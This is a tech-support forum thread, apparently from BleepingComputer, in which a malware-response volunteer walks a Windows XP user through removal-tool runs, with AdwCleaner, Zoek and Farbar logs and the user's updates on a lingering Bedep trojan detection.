H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} => moved successfully.
TorchCrashHandler => Service not found.
BITS => Service removed successfully.
wuauserv => Service removed successfully.
catchme => Service removed successfully.
easytether => Service removed successfully.
htcdiag => Service removed successfully.
IntelIde => Service removed successfully.
lmimirr => Service removed successfully.
H:\Documents and Settings\All Users\Application Data\TEMP => ":FB1B13D8" ADS removed successfully..
"H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch" => File/Folder not found.

The system needed a reboot.

==== End of Fixlog 22:41:08 ====

 

 

# AdwCleaner v4.207 - Logfile created 23/06/2015 at 22:49:26
# Updated 21/06/2015 by Xplode
# Database : 2015-06-21.1 [Local]
# Operating system : Microsoft Windows XP Service Pack 3 (x86)
# Username : Daniel - DAN
# Running from : H:\Documents and Settings\Daniel\Desktop\adwcleaner_4.207.exe
# Option : Cleaning

***** [ Services ] *****

***** [ Files / Folders ] *****

Folder Deleted : H:\Documents and Settings\All Users\Application Data\ytd video downloader
Folder Deleted : H:\Documents and Settings\Daniel\My Documents\Updater
[!] Folder Deleted : H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\lfmhcpmkbdkbgbmkjoiopeeegenkdikp
File Deleted : H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\chrome-extension_lfmhcpmkbdkbgbmkjoiopeeegenkdikp_0.localstorage
File Deleted : H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\chrome-extension_lfmhcpmkbdkbgbmkjoiopeeegenkdikp_0.localstorage-journal
File Deleted : H:\END
File Deleted : H:\Documents and Settings\Daniel\Desktop\eBay.lnk
File Deleted : H:\Program Files\Mozilla Firefox\defaults\pref\itms.js
File Deleted : H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\hxxp_www.yourtango.com_0.localstorage
File Deleted : H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\hxxp_www.yourtango.com_0.localstorage-journal

***** [ Scheduled tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Deleted : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ask.com
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1663C10B-0D55-438D-8496-19A3DBAEC0E4}
Key Deleted : HKCU\Software\Conduit
Key Deleted : HKCU\Software\systweak
Key Deleted : HKCU\Software\torch
Key Deleted : HKLM\SOFTWARE\DivX\Install\Setup\WizardLayout\ConduitToolbar
Key Deleted : HKLM\SOFTWARE\torch
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{1a413f37-ed88-4fec-9666-5c48dc4b7bb7}
Data Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyOverride] - *.local

***** [ Web browsers ] *****

-\\ Internet Explorer v8.0.6001.18702

-\\ Mozilla Firefox v12.0 (en-US)

-\\ Google Chrome v

*************************

AdwCleaner[R0].txt - [2576 bytes] - [23/06/2015 22:47:16]
AdwCleaner[S0].txt - [2543 bytes] - [23/06/2015 22:49:26]

########## EOF - H:\AdwCleaner\AdwCleaner[S0].txt - [2602  bytes] ##########

 

 

 

 

No change in computer operation.

 

It's so laggy I can watch each letter appear a second or two after typing it.

 

At shutdown/restart I get multiple error messages (msiexec, qttask, msdtc). I also got a random popup at shutdown/restart this morning.

 

IP is still wrong.


Edited by danielzink, 24 June 2015 - 06:33 AM.


#4 nasdaq

nasdaq

  • Malware Response Team
  • 38,242 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:09:07 PM

Posted 24 June 2015 - 07:52 AM

Temporarily disable your AV program so it does not interfere.
Info on how to disable your security applications: How To Temporarily Disable Your Anti-virus, Firewall And Anti-malware Programs - Security Mini-Guides.

Download the Zoek tool from here

When the download appears, save to the Desktop.
On the Desktop, right-click the Zoek.exe file and select: Run as Administrator
(Give it a few seconds to appear.)

Next, copy/paste the entire script inside the code box below to the input field of Zoek:
createsrpoint;
autoclean;
emptyalltemp;
ipconfig /flushdns;b
Now...
Close any open Browsers.
Click the Run script button, and wait. It takes a few minutes to run the whole script.

When the tool finishes, the zoek-results.log is opened in Notepad.
The log is also found on the systemdrive, normally C:\
If a reboot is needed, the log is opened after the reboot.

Please attach the zoek-results.log in your reply.

Also, please provide an update on how the computer is behaving after running the above script.

#5 danielzink

danielzink
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:10:07 PM

Posted 24 June 2015 - 04:15 PM

zoek log:

 

Zoek.exe v5.0.0.0 Updated 04-May-2015
Tool run by Daniel on Wed 06/24/2015 at  9:25:45.95.
Microsoft Windows XP Professional 5.1.2600 Service Pack 3 x86
Running in: Normal Mode Internet Access Detected
Launched: H:\Documents and Settings\Daniel\Desktop\zoek.exe [Scan all users] [Script inserted]

==== System Restore Info ======================

6/24/2015 9:40:00 AM Zoek.exe System Restore Point Created Successfully.

==== Possible Rootkit Infection ======================

H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Desktop\Install

==== Empty Folders Check ======================

H:\Program Files\Malwarebytes' Anti-Malware deleted successfully
H:\Program Files\NirSoft deleted successfully
H:\Program Files\Xenocode deleted successfully
H:\DOCUME~1\ALLUSE~1\APPLIC~1\Malwarebytes' Anti-Malware (portable) deleted successfully
H:\DOCUME~1\ALLUSE~1\APPLIC~1\xml_param deleted successfully
H:\Documents and Settings\Daniel\Application Data\AdobeUM deleted successfully
H:\Documents and Settings\Daniel\Application Data\Malwarebytes deleted successfully
H:\Documents and Settings\Daniel\Application Data\Vso deleted successfully
H:\Documents and Settings\LocalService\Application Data\Apple Computer deleted successfully
H:\Documents and Settings\NetworkService\Application Data\Apple Computer deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\WMTools Downloaded Files deleted successfully

==== Deleting CLSID Registry Keys ======================

HKEY_USERS\S-1-5-21-1645522239-117609710-725345543-1003\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0A900DF-9611-4446-86BD-4B1D47E7DB2A} deleted successfully
HKEY_USERS\S-1-5-21-1645522239-117609710-725345543-1003\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F4E39681-15F8-4fda-B8A3-B5C98378F2F3} deleted successfully

==== Deleting CLSID Registry Values ======================

==== Deleting Services ======================

==== Batch Command(s) Run By Tool======================

==== Deleting Files \ Folders ======================

H:\Program Files\NirSoft not found
H:\Program Files\Xenocode not found
H:\DOCUME~1\ALLUSE~1\APPLIC~1\Malwarebytes' Anti-Malware (portable) not found
H:\Program Files\ComPlus Applications deleted
H:\Program Files\WindowsUpdate deleted
H:\Documents and Settings\Daniel\.android deleted
H:\Documents and Settings\Daniel\Application Data\pcouffin.log deleted
H:\DOCUME~1\ALLUSE~1\APPLIC~1\lpm.dat deleted
H:\DOCUME~1\ALLUSE~1\APPLIC~1\LaunchURL.bat deleted
H:\DOCUME~1\ALLUSE~1\APPLIC~1\Package Cache deleted
H:\WINDOWS\system32\GroupPolicy\ADM deleted
"H:\Documents and Settings\Daniel\Application Data\????" not deleted
"H:\Documents and Settings\Daniel\Application Data\Android\7z.dll" deleted
"H:\Documents and Settings\Daniel\Application Data\Android\7z.exe" deleted
"H:\Documents and Settings\Daniel\Application Data\Android\aapt.exe" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\Converter\UnpinShortcuts.vbs" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\Player\Media Library" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\Player\player.blob" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\Player\UnpinShortcuts.vbs" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\TransferWizard\Devices" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DivX Stream Engine\v3.1\Font Cache" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DivX Stream Engine\v3.1\Hardware Cache" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\device_description.xbox360.xml" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\device_description.xml" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\service_description.xml" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\webroot\avtransport.xml" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\webroot\connectionmanager.xml" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\webroot\contentdirectory.xml" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\webroot\index.html" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\webroot\logo.jpg" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\webroot\logo.png" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\webroot\mediareceiverregistrar.xml" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\webroot\renderingcontrol.xml" deleted
"H:\Documents and Settings\Daniel\Application Data\ESET\ESET Smart Security\ekrnSmonEL.dat" deleted
"H:\Documents and Settings\Daniel\Application Data\ESET\ESET Smart Security\ekrnSmonWL.dat" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX" deleted
"H:\Documents and Settings\Daniel\Application Data\ESET" deleted
"H:\Documents and Settings\Daniel\Application Data\Help" deleted
"H:\Documents and Settings\Daniel\Application Data\Android" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\Converter" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DivX Codec" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DivX Stream Engine" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\Player" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\TransferWizard" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DivX Stream Engine\v3.1" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\thumbnails" deleted
"H:\Documents and Settings\Daniel\Application Data\DivX\DMS\data\webroot" deleted
"H:\Documents and Settings\Daniel\Application Data\ESET\ESET Smart Security" deleted
"H:\DOCUME~1\ALLUSE~1\APPLIC~1\{88B60AEA-CBC9-4FDE-978C-EB22BD2333B2}" not deleted

==== Firefox Start and Search pages ======================

ProfilePath: H:\Documents and Settings\Daniel\Application Data\Mozilla\Firefox\Profiles\fq27hxil.default
user_pref("browser.startup.homepage", "http://www.cnn.com/");

==== Firefox Extensions Registry ======================

[HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\Extensions]
"{20a82645-c095-46ed-80e3-08825760534b}"="h:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension" [08/19/2010 07:49 PM]

==== Firefox Extensions ======================

ProfilePath: H:\Documents and Settings\Daniel\Application Data\Mozilla\Firefox\Profiles\fq27hxil.default
- Flagfox - %ProfilePath%\extensions\{1018e4d6-728f-4b20-ad56-37578a4de76b}
- Microsoft .NET Framework Assistant - %ProfilePath%\extensions\{20a82645-c095-46ed-80e3-08825760534b}

AppDir: H:\Program Files\Mozilla Firefox
- Default - %AppDir%\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

==== Firefox Plugins ======================

Profilepath: H:\Documents and Settings\Daniel\Application Data\Mozilla\Firefox\Profiles\fq27hxil.default
6BEAD7859E8A087BE04556AB5A78855C - H:\Documents and Settings\Daniel\Application Data\Mozilla\plugins\npo1d.dll - Google Talk Plugin Video Renderer
49D429EBF5305FC9ADD7545B7C914333 - H:\Documents and Settings\Daniel\Application Data\Mozilla\plugins\npgoogletalk.dll - Google Talk Plugin
D0E0E175428BA9443D2F144A163DEF5A - H:\Program Files\DivX\DivX Web Player\npdivx32.dll - DivX Plus Web Player
46A59E6F7F7C1679AC7C4655E055326D - H:\Program Files\iTunes\Mozilla Plugins\npitunes.dll - iTunes Application Detector
559E8D42BE485208F1C4BB294D6840A4 - H:\Program Files\Mozilla Firefox\plugins\npqtplugin5.dll - QuickTime Plug-in 7.7.6
5D4279248A0E506CF007BD51EBF74CEA - H:\Program Files\Mozilla Firefox\plugins\npqtplugin4.dll - QuickTime Plug-in 7.7.6
F9DE379CE8A782530A4FA0B731F3A49B - H:\Program Files\Mozilla Firefox\plugins\npqtplugin3.dll - QuickTime Plug-in 7.7.6
049BD7AD3B94F24FA274ED1F7FC5871B - H:\Program Files\Mozilla Firefox\plugins\npqtplugin2.dll - QuickTime Plug-in 7.7.6
D937A4645EFF8CB4F123E3C899C052B2 - H:\Program Files\Mozilla Firefox\plugins\npqtplugin.dll - QuickTime Plug-in 7.7.6
14D06C3796CE3F6BA8F43CDF3AD65D76 - H:\Program Files\Java\jre7\bin\plugin2\npjp2.dll - Java™ Platform SE 7 U67
0A6E5E3BEF374AA2F47071E7374EAD7B - H:\Program Files\Java\jre7\bin\dtplugin\npdeployJava1.dll - Java Deployment Toolkit 7.0.670.1
79039398587F475ADA606D1A3B740A63 - H:\Program Files\DivX\DivX OVS Helper\npovshelper.dll - DivX VOD Helper Plug-in
95812430959AE88CDD0301AB3A71913B - H:\WINDOWS\system32\Macromed\Flash\NPSWF32_12_0_0_77.dll - Shockwave Flash
E3B4EA121F7BDEB0F6366E2BA9608CB5 - H:\Documents and Settings\Daniel\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll - Citrix Online Web Deployment Plugin 1.0.0.104
BE501CBC29B2025A263D80D399F1797A - H:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll - Silverlight Plug-In
E0AD06BE7DBEC6EF843711E97080549A - H:\Program Files\Adobe\Acrobat 9.0\Acrobat\Air\nppdf32.dll - Adobe Acrobat
AB87EEFFD18F2BAAFC274E7075EA6C67 - H:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll - Windows Presentation Foundation / Windows Presentation Foundation
28000D7EEB2FD95A36E1A7539F599C3B - H:\Program Files\Windows Media Player\npdrmv2.dll - Microsoft® DRM
8B6884E3E1E5F8ABA5FA0C6A2B13181D - H:\Program Files\Windows Media Player\npwmsdrm.dll - Microsoft® DRM
5D41BCD19A3D90E4EBB58A6BFB79E4F7 - H:\Program Files\Windows Media Player\npdsplay.dll - Windows Media Player Plug-in Dynamic Link Library
559E8D42BE485208F1C4BB294D6840A4 - H:\Program Files\QuickTime\Plugins\npqtplugin5.dll - QuickTime Plug-in 7.7.6
5D4279248A0E506CF007BD51EBF74CEA - H:\Program Files\QuickTime\Plugins\npqtplugin4.dll - QuickTime Plug-in 7.7.6
F9DE379CE8A782530A4FA0B731F3A49B - H:\Program Files\QuickTime\Plugins\npqtplugin3.dll - QuickTime Plug-in 7.7.6
049BD7AD3B94F24FA274ED1F7FC5871B - H:\Program Files\QuickTime\Plugins\npqtplugin2.dll - QuickTime Plug-in 7.7.6
D937A4645EFF8CB4F123E3C899C052B2 - H:\Program Files\QuickTime\Plugins\npqtplugin.dll - QuickTime Plug-in 7.7.6
B27CCB1168B1960AEC6E9D3E0E0F0D2A - H:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrlui.dll - Microsoft® Silverlight

==== Chromium Look ======================

Tidy Sidebar - Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dgmacifhhpefamjmolpipkijcofcmbgp
Chrome Hotword Shared Module - Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg

==== Chromium Startpages ======================

H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Preferences
FCC8C5A62EFAB68D232B5F5D1E680B5558731849456BB0"}},"homepage":"9C5CEE992DD514CC1DA27D3B8518574EE348EC61C6F3ADEFF41FE29BB9587427","homepage_is_newtabpage":"596CFF901B5BE41138F6E5F48B744E581DF4DC7B8F4ED225D3F4582A8114F792","pinned_tabs":"35427C19C663B7B485AFBEB3F809439FA156E2C49143E7BF954786AF44EA8F64","prefs":{"preference_reset_time":"501632AA5093C86CCE751D57C2FE04FA778F9F375351141B01957E1F0A60B056"},"profile":{"reset_prompt_memento":"C55E3759B9F0A9232E22EF1A8A4879DB18AEAFCDDFDA4B4A150031C9CC2153E7"},"safebrowsing":{"incidents_sent":"4342C3CA39B2C3B81BA66BC612E5AC21840D13AA12DA81DA73B713739F73D07A"},"search_provider_overrides":"4708C65C58EEE4482158BE7852A0BADE0255AF0152CB10BF9291D281F4FACAC2","session":{"restore_on_startup":"6B6DD132B0D4A1FC4BE8AF6BC715A857094E3EB035C81776BF9A4CA3939C5BE4","startup_urls":"2CB655690C07B151EC5239353809FE17D00ABED0D6AECC045E89BD57B262F79E"},"software_reporter":{"prompt_reason":"46303140CE21D11071D778BB11DB28FC53E34EFAB11896037CA9B263DA99F40F","prompt_seed":"508824F68082373E47B3B6DB2849A63D92F1D33CB96D755D116A8797225E2F72","prompt_version":"46EA9628F6D25B049A9B09CB5A0EAC8234D531A719DB6D67B2F72204F4534895"},"sync":{"remaining_rollback_tries":"368E6EF0385FDEB35AFBED0DD95A6D57F87348C85F22B63810231DEF9B8EE797"}},"super_mac":"5347599CB078C138374700276539C273B637727F0CBAF6B78BEC3141C9DA799A"},"session":{"restore_on_startup":4,"startup_urls":["http://www.msn.com/","http://www.cnn.com/"]},"sync":{"remaining_rollback_tries":0}}

==== Chromium Fix ======================

H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_lyrics.wikia.com_0.localstorage deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_lyrics.wikia.com_0.localstorage-journal deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_www.allthelyrics.com_0.localstorage deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_www.allthelyrics.com_0.localstorage-journal deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_www.lyricsfreak.com_0.localstorage deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_www.lyricsfreak.com_0.localstorage-journal deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_www.metrolyrics.com_0.localstorage deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_www.metrolyrics.com_0.localstorage-journal deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_shop.boldshopping.com_0.localstorage deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_shop.boldshopping.com_0.localstorage-journal deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_unlimitedshoppingchoice.com_0.localstorage deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\http_unlimitedshoppingchoice.com_0.localstorage-journal deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\https_static.olark.com_0.localstorage deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\https_static.olark.com_0.localstorage-journal deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\https_services2.capitalone.com_0.localstorage deleted successfully
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\https_services2.capitalone.com_0.localstorage-journal deleted successfully

==== Set IE to Default ======================

Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.cnn.com/"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="res://ieframe.dll/tabswelcome.htm"

New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.cnn.com/"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="about:newtab"

==== All HKCU SearchScopes ======================

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes
"DefaultScope"="{C02C90FA-7AC3-41C0-8908-8A8F444FD4DE}"
{012E1000-F331-11DB-8314-0800200C9A66} Google  Url="http://www.google.com/search?q={searchTerms}"
{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing  Url="http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC"
{6A1806CD-94D4-4689-BA73-E35EA1EA9990} @ieframe.dll,-12512  Url="http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC"
{C02C90FA-7AC3-41C0-8908-8A8F444FD4DE} Google  Url="http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}"

==== Deleting Registry Keys ======================

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{CAAB0192-5704-469F-A0BE-2D842D70E93B}_is1 deleted successfully

==== Empty IE Cache ======================

H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\01GP4IA2 will be deleted at reboot
H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\1HK8FZDD will be deleted at reboot
H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\2RJKB18Q will be deleted at reboot
H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\6IBS2IM1 will be deleted at reboot
H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\8QMU1OFJ will be deleted at reboot
H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\FSLZOMR5 will be deleted at reboot
H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\LM82SWYN will be deleted at reboot
H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\XARNOC8S will be deleted at reboot
H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\index.dat will be deleted at reboot
H:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat will be deleted at reboot

==== Empty FireFox Cache ======================

No FireFox Cache found

==== Empty Chrome Cache ======================

H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache emptied successfully

==== Empty All Flash Cache ======================

Flash Cache Emptied Successfully

==== Empty All Java Cache ======================

Java Cache cleared successfully

==== H:\zoek_backup content ======================

H:\zoek_backup (files=58 folders=27 57970795 bytes)

==== Empty Temp Folders ======================

H:\Documents and Settings\Daniel\Local Settings\Temp will be emptied at reboot
H:\Documents and Settings\Default User\Local Settings\temp emptied successfully
H:\Documents and Settings\LocalService\Local Settings\temp emptied successfully
H:\Documents and Settings\LogMeInRemoteUser\Local Settings\temp emptied successfully
H:\Documents and Settings\NetworkService\Local Settings\temp emptied successfully
H:\WINDOWS\Temp will be emptied at reboot

==== After Reboot ======================

==== Empty Temp Folders ======================

H:\WINDOWS\Temp successfully emptied
H:\DOCUME~1\Daniel\LOCALS~1\Temp successfully emptied

==== Empty Recycle Bin ======================

H:\RECYCLER successfully emptied

==== Deleting Files / Folders ======================

"H:\Documents and Settings\Daniel\Application Data\????"  not deleted
"H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\index.dat" not found
"H:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat" not deleted
"H:\DOCUME~1\ALLUSE~1\APPLIC~1\{88B60AEA-CBC9-4FDE-978C-EB22BD2333B2}"  not found
"H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\01GP4IA2" not found
"H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\1HK8FZDD" not found
"H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\2RJKB18Q" not found
"H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\6IBS2IM1" not found
"H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\8QMU1OFJ" not found
"H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\FSLZOMR5" not found
"H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\LM82SWYN" not found
"H:\Documents and Settings\Daniel\Local Settings\Temporary Internet Files\Content.IE5\XARNOC8S" not found

==== EOF on Wed 06/24/2015 at 16:54:01.48 ======================

Computer "seems" good now (5:15pm EDT).

I will report back in a few hours.



#6 nasdaq

  • Malware Response Team
  • 38,242 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 25 June 2015 - 06:43 AM

If all is well.

To learn more about how to protect yourself while on the internet, read this little guide on best security practices to keep safe.
http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/
===

#7 danielzink
  • Topic Starter
  • Members
  • 21 posts

Posted 25 June 2015 - 04:38 PM

Back at square one.

I can barely open a folder. I tried to open an Excel file and after 5 minutes of the hard drive spinning I gave up.

Eset continuously pops up and says it found a Win32/Bedep.D Trojan and I need to reboot to finish the cleaning process.

Upon reboot (to potentially finish Eset's cleaning process) "notepad.exe failed", "msdtc.exe failed" and "msiexec.exe failed" messages appear.

At reboot the same Eset message appears... I could reboot 20 times and the same message appears and the same exe error messages appear.

Ipconfig from a cmd window still shows an odd IP. All other computers in the house show a 123.123.12.1 type of IP.

The infected computer shows a 12.12.123.123 type of IP.

I have done very little with the computer since doing the zoek yesterday. I do leave the computer on all the time.

I have two "My Book" type external hard drives attached to the computer that are set to do redundant backups once a week.

Could something "hide" on one of them? I'm grasping at straws at this point...

Thanks for your help.



#8 nasdaq

  • Malware Response Team
  • 38,242 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 26 June 2015 - 07:56 AM

Ipconfig from a cmd window still shows an odd ip. All other computers in the house show a 123.123.12.1 type of ip.

The infected computer shows a 12.12.123.123 type of ip.



http://whatismyipaddress.com/ip/12.12.123.123

From:
AT&T Services
State/Region: Alaska
City: Anchorage
===

http://whatismyipaddress.com/ip/123.123.12.1

From:
ISP: China Unicom Beijing
State/Region: Beijing Shi
City: Beijing



Are both required?

===

Let's check these files.

Please run the Farbar Recovery Scan Tool. Enter notepad.exe;msdtc.exe;msiexec.exe in the Search Box and hit the File Search button.
Post the content of the Search.txt in your next reply.

#9 danielzink
  • Topic Starter
  • Members
  • 21 posts

Posted 26 June 2015 - 01:08 PM

I apologize.

Rather than posting the exact IP I was more trying to illustrate that all other computers in the house show IPs that are (three numbers.three numbers.two numbers.one number); the "infected" computer's IP is (two numbers.two numbers.three numbers.three numbers).

I will run the Farbar scan and report back.

Thanks.



#10 danielzink
  • Topic Starter
  • Members
  • 21 posts

Posted 26 June 2015 - 01:17 PM

Farbar Recovery Scan Tool (x86) Version: 13-06-2015
Ran by Daniel at 2015-06-26 14:14:28
Running from H:\Documents and Settings\Daniel\Desktop
Boot Mode: Normal
 
================== Search Files: "notepad.exe;msdtc.exe;msiexec.exe" =============
 
H:\WINDOWS\notepad.exe
[2010-08-18 06:42][2008-04-13 20:12] 0069120 ____A (Microsoft Corporation) 5e28284f9b5f9097640d58a73d38ad4c      [File is signed]
 
H:\WINDOWS\system32\msdtc.exe
[2010-08-18 10:59][2008-04-13 20:12] 0006144 ____A (Microsoft Corporation) a137f1470499a205abbb9aafb3b6f2b1      [File is signed]
 
H:\WINDOWS\system32\msiexec.exe
[2004-08-04 00:56][2008-04-13 20:12] 0078848 ____A (Microsoft Corporation) 5879d691e842574a20fe63817cb76df9      [File is signed]
 
H:\WINDOWS\system32\notepad.exe
[2004-08-04 00:56][2008-04-13 20:12] 0069120 ____A (Microsoft Corporation) 5e28284f9b5f9097640d58a73d38ad4c      [File is signed]
 
H:\WINDOWS\ServicePackFiles\i386\msdtc.exe
[2008-04-13 20:12][2008-04-13 20:12] 0006144 _____ (Microsoft Corporation) a137f1470499a205abbb9aafb3b6f2b1      [File is signed]
 
H:\WINDOWS\ServicePackFiles\i386\msiexec.exe
[2008-04-13 20:12][2008-04-13 20:12] 0078848 _____ (Microsoft Corporation) 5879d691e842574a20fe63817cb76df9      [File is signed]
 
H:\WINDOWS\ServicePackFiles\i386\notepad.exe
[2008-04-13 20:12][2008-04-13 20:12] 0069120 _____ (Microsoft Corporation) 5e28284f9b5f9097640d58a73d38ad4c      [File is signed]
 
====== End of Search ======


#11 nasdaq

  • Malware Response Team
  • 38,242 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 27 June 2015 - 07:28 AM

--RogueKiller--
  • Download & SAVE to your Desktop: Download RogueKiller
  • Quit all programs that you may have started.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • For Vista or Windows 7, right-click and select "Run as Administrator" to start.
  • For Windows XP, double-click to start.
  • Wait until Prescan has finished...
  • Then click on the "Scan" button.
  • Wait until the Status box shows "Scan Finished".
  • Click on "Delete".
  • Wait until the Status box shows "Deleting Finished".
  • Click on "Report" and copy/paste the content of the Notepad into your next reply.
  • The log should be found in RKreport[1].txt on your Desktop.
  • Exit/Close RogueKiller.
=======

#12 danielzink
  • Topic Starter
  • Members
